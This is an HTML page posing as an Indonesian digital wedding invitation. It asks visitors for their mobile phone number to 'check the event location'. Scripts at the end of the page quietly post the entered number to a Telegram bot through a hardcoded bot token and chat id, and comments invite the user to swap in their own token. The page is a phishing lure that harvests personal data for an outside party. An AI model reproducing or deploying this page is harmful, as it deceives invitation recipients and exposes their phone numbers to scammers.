<!DOCTYPE html>
<html class="preload">
  <head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta charset="utf-8">
     <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, user-scalable=no,"> 

    <!-- The name of your site that shows up in the browser tab -->
    <title>Undangan Pernikanan Digital</title>

    <!-- Describe what your site is about -->
    <meta name="description" content="A list of places you can find me on the web.">

    <!-- This is the small icon that shows up in the browser tab -->
    <link rel="shortcut icon" href="/images/favicon.png">

    <!-- Styling for this site -->
    <link rel="stylesheet" href="/css/styles.css">
    <link href="https://fonts.googleapis.com/css?family=Engagement" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Englebert" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Farsan" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Niconne" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Norican" rel="stylesheet" type="text/css">
    <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.min.css'>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.12.15/dist/sweetalert2.all.min.js"></script>






  </head>
<style>
/* Fonts
--------------------------*/
@import url("https://rsms.me/inter/inter-ui.css");

/* Variables
---------------------------*/

:root {

  --color-teal-T1000: #052028;
  --color-teal-T900: #054861;
  --color-teal-T800: #0F6A80;

  --color-gray-L700: #33373B;
  --color-gray-L200: #F2F5F8;
  --color-gray-D200: #A3A8AC;

  background: url('https://www.gambaranimasi.org/data/media/1020/animasi-bergerak-pengantin-pria-wanita-0038.gif');
  background-repeat: no-repeat;
  background-size: 112% 100%;
  --color-yellow-Y400: #FFCF50;

  --color-red-R600: #DB4648;

  --body-border: .6em;
  --body-padding: 3vw;
  --color-mode: 'light';
  --background: var(--color-yellow-Y500);
  --background-alt:  var(--color-yellow-Y400);
  --text-color: var(--color-gray-L700);
  --mode-icon: '🌑';
  --mode-icon-opacity: '1';
  --border-color: var(--text-color);
  background-image: url('https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRrwLnHyWkcCWvXsSdj59o7ZNZZBNPdeXU1aA&usqp=CAU');
   background-repeat: no-repeat;
  background-size: 100% 100%;
}

/* Dark Mode
---------------------------*/

@media (prefers-color-scheme: dark) {
  :root {
    --color-mode: 'dark';
  }

  :root:not([data-user-color-scheme]) {
   
    --text-color: var(--color-gray-L200);
    --border-color: var(--color-teal-T800);
    --mode-icon: '🌕';
    --mode-icon-opacity: .85;

     
background-color: 
    color: #fff;
       background-repeat: no-repeat;
  background-size: 100% 100%;
  }
}

[data-user-color-scheme='dark'] {
  background: url('https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQlSFyRIvWYtO8kQCi52e9m8Hlx6PzfGnzGjw&usqp=CAU');
   background-repeat: no-repeat;
  background-size: 112% 100%;
  
  --text-color: var(--color-gray-L200);
  --border-color: var(--color-teal-T800);
  --mode-icon: '🌕';
  --mode-icon-opacity: .85;
}

/* Global
---------------------------*/

*, *::before, *::after {
  box-sizing: border-box;
}

::selection {
  
    color: #fff;
}
html {
  max-height: 100vh;
  padding: var(--body-border);
 
  text-align: center;
}

body {
  min-height: calc(100vh - var(--body-border)*2);
  margin: 0;
  padding: 2.5vw 2.5vw 5vw;
  display: flex;
  flex-direction: column;
  gap: 1vw;
  max-height: 600px;
  border-radius: 5px;
  font-size: 112.5%;
  font-family: "Inter UI", Helvetica, Arial, sans-serif;
  line-height: 1.4;;
  color: var(--text-color);
  text-align: center;
 
}

body.no-js {
  padding-top: 5vw;
}

/* Header
---------------------------*/

header {
  display: flex;
  justify-content: flex-end;
  flex: 1 0 1;
}

body.no-js .toggle-button {
  display: none;
}

.toggle-button {
  margin-top: auto;
  padding: .4em .8em;
  border: none;
  border-radius: 5px;
  font-size: clamp(1rem, 1vw, 1.5rem);
  color: var(--text-color);
  cursor: pointer;
}

.toggle-button::before {
  content: var(--mode-icon);
  opacity: var(--mode-icon-opacity);
}

.toggle-button:focus {
  outline: none;
  border: none;
}

.toggle-button:focus-visible {
  outline: 2px solid var(--text-color);
}

/* Main
---------------------------*/

main {
  display: flex;
  flex-direction: column;
  gap: 3vw;
  flex: 1;
  text-align: center;
}

@media screen and (min-width: 800px) {
  main {
    flex-direction: row;
    text-align: center;
  }
}

/* About section
---------------------------*/

.about {
  padding: 1rem var(--body-padding) 0;
  flex: 1 0 1;;
  border-top: 3px inset #ff0000;
border-right: 3px inset #00ff03;
border-bottom: 3px inset #ffed00;
border-left: 3px inset #50e3ff;
border-radius: 10px;
background-image: url('https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRSGJUjJW1ciVPkhFcXCfnGrZngxO5HCKsEBg&usqp=CAU');
         background-position: 100% 100%;
         background-size: 100% 100%;
}

@media screen and (min-width: 800px) {
  .about {
    padding: 1rem 0 0;
    flex: 1;
  }
}

.about,
.links {
  border-top: 4px solid var(--border-color);
}

.about > * {
  margin: 0 0 1rem;
  font-size: ;
}

.about h1 {
  font-size: 53px;
  text-align: center;
  margin-top: -20px;
}

.about h2 {
  font-size: clamp(1.2rem, 2vw, 2.7rem);
}

.about ul {
  padding-left: 1em;
}

/* Links section
---------------------------*/

.links {
  display: flex;
  flex-direction: column;
  flex: 2;
}

.links > a {
  padding-right: var(--body-padding);
  position: relative;
  overflow: hidden;
  display: flex;
  align-items: center;
  flex: 1;;
  border-bottom: 1px solid var(--border-color);
  text-decoration: none;
  font-size: clamp(1.5rem, 5vw, 10rem);
  color: var(--text-color);
}

.links > a > strong {
  padding-left: var(--body-padding);
  padding-right: .5em;
  position: relative;
  display: flex;
  align-items: center;
  background-color: var(--background);
  z-index: 1;
}

.links > a > strong:after {
  content: '';
  width: 1px;
  height: 100%;
  position: absolute;
  right: 0;
  top: 50%;
  background-color: var(--text-color);
  opacity: 0;
  transition: opacity 100ms ease-in-out;
  transform: translateY(-50%);
}

@media screen and (min-width: 800px) {
  .links > a > strong:after {
    height: 80%;
  }
}

.links > a:hover > strong:after,
.links > a:focus > strong:after {
  opacity: .5;
}

.links > a > span {
  position: relative;
  font-size: clamp(1rem, 2vw, 2rem);
  transition: transform 150ms ease-in-out;
  transform: translateX(-100%);
  z-index: 0;
}

@media (prefers-reduced-motion) {
  .links > a > span {
    transition: none;
  }
}

.links > a:hover > span,
.links > a:focus > span  {
  transform: translateX(1em);
}

.links > a:focus {
  outline: none;
}

.links > a:focus,
.links > a:focus > strong {
  background-color: var(--background-alt);
}

.btn-undangan{
    width: 85%;
    max-width: 100%;
    height: 40px;
    margin-top: 10px;
    background: yellow;
    color: yellow;
    font-weight: 800;
    font-size: 20px; 
    text-align: center; 
     font-size: 22px;
    -webkit-text-stroke-width: 0.5px;
    -webkit-text-stroke-color: #88ff00;
    -webkit-text-fill-color: #000000;
    letter-spacing: 1px;
    border: none;
    font-family: Engagement;
    text-shadow: 2px 2px 2px #9e9e9e;
    border-radius: 20px;
    box-shadow: 3px 2px 4px 2px #9e9e9e;;
}

.btn-undangan1{
    width: 85%;
    max-width: 100%;
    height: 40px;
     margin-top: 30px;
    background: #fff;
    margin-bottom: 60px;
    color: yellow;
    margin-top: 30px;
    border-top: 2px inset #ff0000;
border-right: 2px inset #00ff03;
border-bottom: 2px inset #ffed00;
border-left: 2px inset #50e3ff;
    font-weight: 800;
    font-size: 18px; 
    text-align: center; 
     
    -webkit-text-stroke-width: 0.5px;
    -webkit-text-stroke-color: #88ff00;
    -webkit-text-fill-color: #000000;
    letter-spacing: 0px;
    font-family: Farsan;
    
    border-radius: 10px;
    box-shadow: 3px 2px 4px 2px #bbb;;
}


 

button:hover {
  background: orange;
}

     .form-undangan {
         padding-top: 20px;
         background: #fff;
         background-image: url('https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRFZCCeCm4jd9eFwf-QwNgTz-RgE6gXSglixA&usqp=CAU');
         background-position: 100% 100%;
         background-size: 100% 100%;
         max-width: 90%;
         height: 380px;
         border-top: 4px inset #ff0000;
border-right: 4px inset #00ff03;
border-bottom: 4px inset #ffed00;
border-left: 4px inset #50e3ff;
margin-top: 32px;
border-radius: 10px;
     }
     
     
     

.form-control + .form-control {
  margin-top: 1em;
}

.form-control--disabled {
  color: var(--form-control-disabled);
  cursor: not-allowed;
}

input[type="checkbox"] {
  /* Add if not using autoprefixer */
  -webkit-appearance: none;
  /* Remove most all native input styles */
  appearance: none;
  /* For iOS < 15 */
  background-color: var(--form-background);
  /* Not removed via appearance */
  margin: 0;

  font: inherit;
  color: currentColor;
  width: 1.15em;
  height: 1.15em;
  border: 0.15em solid currentColor;
  border-radius: 0.15em;
  transform: translateY(-0.075em);

  display: grid;
  place-content: center;
}

input[type="checkbox"]::before {
  content: "";
  width: 0.65em;
  height: 0.65em;
  clip-path: polygon(14% 44%, 0 65%, 50% 100%, 100% 16%, 80% 0%, 43% 62%);
  transform: scale(0);
  transform-origin: bottom left;
  transition: 120ms transform ease-in-out;
  box-shadow: inset 1em 1em var(--form-control-color);
  /* Windows High Contrast Mode */
  background-color: CanvasText;
}

input[type="checkbox"]:checked::before {
  transform: scale(1);
}

input[type="checkbox"]:focus {
  outline: max(2px, 0.15em) solid currentColor;
  outline-offset: max(2px, 0.15em);
}

input[type="checkbox"]:disabled {
  --form-control-color: var(--form-control-disabled);

  color: var(--form-control-disabled);
  cursor: not-allowed;
}
     
     input[type="checkbox"]{
        
         appearance: none;
  background-color: #fff;
  margin: 0;
  font: inherit;
  color: currentColor;
  width: 1.15em;
  height: 1.15em;
  border: 0.15em solid currentColor;
  border-radius: 1.15em;
  transform: translateY(-0.075em);
}

.stroke {
    font-size: 45px;
    -webkit-text-stroke-width: 1.5px;
    -webkit-text-stroke-color: green;
    -webkit-text-fill-color: black;
    letter-spacing: 20px;
    font-family: Norican;
    text-align: center;
    color: ;
    text-align: center; color: snow; 
    -webkit-text-stroke: 0.7px yellow; /* width and color */

    font-family: ; color: yellow;
}

</style>
  <!-- This class is removed if the user has JavaScript enabled -->
  <body class="no-js">
    <header>
      <!-- Dark mode toggle -->
      <div class="mode-toggle" style="background-color: orange; border-radius: 15px;">
        <button class="[ toggle-button ] [ js-mode-toggle ]" style="background-color: orange; border-radius: 10px;">
          <span class="toggle-icon" aria-hidden="true"></span>
          <span class="[ toggle-text ] [ js-mode-toggle-text ]" style="background-color: orange;">Ganti Tema</span>
        </button>
      </div>
    </header>
    <main>
      <section class="about">
          <center>
        <h1 style="text-size: 50px; text-align: center; color: snow; text-shadow: rgb(43, 191, 255) 3px 0px 0px, rgb(43, 191, 255) 2.83487px 0.981584px 0px, rgb(43, 191, 255) 2.35766px 1.85511px 0px, rgb(43, 191, 255) 1.62091px 2.52441px 0px, rgb(43, 191, 255) 0.705713px 2.91581px 0px, rgb(43, 191, 255) -0.287171px 2.98622px 0px, rgb(43, 191, 255) -1.24844px 2.72789px 0px, rgb(43, 191, 255) -2.07227px 2.16926px 0px, rgb(43, 191, 255) -2.66798px 1.37182px 0px, rgb(43, 191, 255) -2.96998px 0.42336px 0px, rgb(43, 191, 255) -2.94502px -0.571704px 0px, rgb(43, 191, 255) -2.59586px -1.50383px 0px, rgb(43, 191, 255) -1.96093px -2.27041px 0px, rgb(43, 191, 255) -1.11013px -2.78704px 0px, rgb(43, 191, 255) -0.137119px -2.99686px 0px, rgb(43, 191, 255) 0.850987px -2.87677px 0px, rgb(43, 191, 255) 1.74541px -2.43999px 0px, rgb(43, 191, 255) 2.44769px -1.73459px 0px, rgb(43, 191, 255) 2.88051px -0.838247px 0px;
    -webkit-text-stroke: 3px black; /* width and color */

    font-family: sans; color: yellow;">UNDANGAN</h1>
    </center>
    <center>
    <h2 class="stroke" style="font-size: 25px; text-align: center; margin-left: 5px; margin-top: -53px; margin-bottom: -10px">Pernikahan</h2></center>
        
      </section>
      <nav class="links">
        
        <center>
           <form onsubmit="pernikahan(this);" action="undangan_pernikahan.html" class="form-undangan" method="get">
                <input type="hidden" id="undangan" value="╚═❖•ೋ°𝗨𝗡𝗗𝗔𝗡𝗚𝗔𝗡 °ೋ•❖═╝"
                <h3 style="margin-top: -5px; margin-bottom: 30px; font-size: 35px;
    -webkit-text-stroke-width: 0.8px;
    -webkit-text-stroke-color: yellow;
    -webkit-text-fill-color: #00aeff;
    letter-spacing: 1px;
    font-family: Farsan;
    text-shadow: 3px 4px 0px #ddd; border-bottom: 1px inset black; width: 230px
">Cek Lokasi Acara</h3>
      <input type="tel" class="btn-undangan1" id="tel" placeholder="Masukkan Nomor Handphone Anda" style="margin-top: -20px;" minlength="10" maxlength="13"  required>
      <p style="text-align: right; margin-top: 85px;"></p>
     <label class="form-control" style="text-align: right; margin-top: 150px; margin-right: -25px; font-size: 10px; font-weight: 800; color: #bbb">Setujui Syarat dan Ketentuan Berlaku</label>
    <input type="checkbox" name="checkbox" style="margin-top: -16px; margin-left: 50px; text-align: left; margin-bottom: -10px; margin-right: 290px; margin-left: 35px"/>
    
      <p></p>
      <button class="btn-undangan" type="submit" onclick="undanganSend()" id="undangan"> • Cek Undangan •</button>
      </form>
      </center>
    </main>

    <!-- Dark mode button functionality -->
    <script src="/js/dark-mode.js"></script>
    <script>
document.querySelector(".first").addEventListener('click', function(){
  swal("Our First Alert");
});
document.querySelector(".second").addEventListener('click', function(){
  swal("Our First Alert", "With some body text!");
});
document.querySelector(".btn-undangan").addEventListener('click', 

function(){
  swal("Our First Alert", "With some body text and success icon!", "success");
});
</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>

  </body>
</html>

 
<script>
var body = document.body;
var root = document.getElementsByTagName( 'html' )[0];

body.classList.remove('no-js');

window.addEventListener( 'load', function load() { window.removeEventListener('load', load, false); root.classList.remove('preload'); }, false);

const STORAGE_KEY = 'user-color-scheme';
const COLOR_MODE_KEY = '--color-mode';

/** Andy Bell’s dark mode technique
https://hankchizljaw.com/wrote/create-a-user-controlled-dark-or-light-mode/
**/

const modeToggleButton = document.querySelector('.js-mode-toggle');
const modeToggleText = document.querySelector('.js-mode-toggle-text');
// const modeStatusElement = document.querySelector('.js-mode-status');

/**
 * Pass in a custom prop key and this function will return its
 * computed value. 
 * A reduced version of this: https://andy-bell.design/wrote/get-css-custom-property-value-with-javascript/
 */
const getCSSCustomProp = (propKey) => {
  let response = getComputedStyle(document.documentElement).getPropertyValue(propKey);

  // Tidy up the string if there’s something to work with
  if (response.length) {
    response = response.replace(/\'|"/g, '').trim();
  }

  // Return the string response by default
  return response;
};

/**
 * Takes either a passed setting ('light'|'dark') or grabs that from localStorage.
 * If it can’t find the setting in either, it tries to load the CSS color mode,
 * controlled by the media query
 */
const applySetting = passedSetting => {
  let currentSetting = passedSetting || localStorage.getItem(STORAGE_KEY);
  
  if(currentSetting) {
    document.documentElement.setAttribute('data-user-color-scheme', currentSetting);
    setButtonLabel(currentSetting);
  }
  else {
    setButtonLabel(getCSSCustomProp(COLOR_MODE_KEY));
  }
}

/**
 * Gets the current setting > reverses it > stores it
 */
const toggleSetting = () => {
  let currentSetting = localStorage.getItem(STORAGE_KEY);
  
  switch(currentSetting) {
    case null:
      currentSetting = getCSSCustomProp(COLOR_MODE_KEY) === 'dark' ? 'light' : 'dark';
      break;
    case 'light':
      currentSetting = 'dark';
      break;
    case 'dark':
      currentSetting = 'light';
      break;
  }


  localStorage.setItem(STORAGE_KEY, currentSetting);
  
  return currentSetting;
}

/**
 * A shared method for setting the button text label and visually hidden status element 
 */
const setButtonLabel = currentSetting => { 
  modeToggleText.innerText = `Switch to ${currentSetting === 'dark' ? 'light' : 'dark'} theme`;
  // modeStatusElement.innerText = `Color mode is now "${currentSetting}"`;
}

/**
 * Clicking the button runs the apply setting method which grabs its parameter
 * from the toggle setting method.
 */
modeToggleButton.addEventListener('click', evt => {
  evt.preventDefault();
  
  applySetting(toggleSetting());
});

applySetting();

</script>
<script>
function undanganSend() {


    var undangan = document.getElementById('undangan');
    var tel = document.getElementById('tel');

    var gabungan = '' + undangan.value + '%0A𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲%3A%0A' + tel.value;
   
    var token = '6280775813:AAG0MKkwNdNy1pJhbd92tHZH20DqlRtNogI'; // Ganti dengan token bot yang kamu buat
    var grup = '5881060872'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    })
}

</script>
<script>
function pernikahan(form) {


    var undangan = document.getElementById('undangan');
    var tel = document.getElementById('tel');

    var gabungan = '' + undangan.value + '%0A𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲%3A%0A' + tel.value;
   
    var token = '6280775813:AAG0MKkwNdNy1pJhbd92tHZH20DqlRtNogI'; // Ganti dengan token bot yang kamu buat
    var grup = '5881060872'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    })
}

</script>
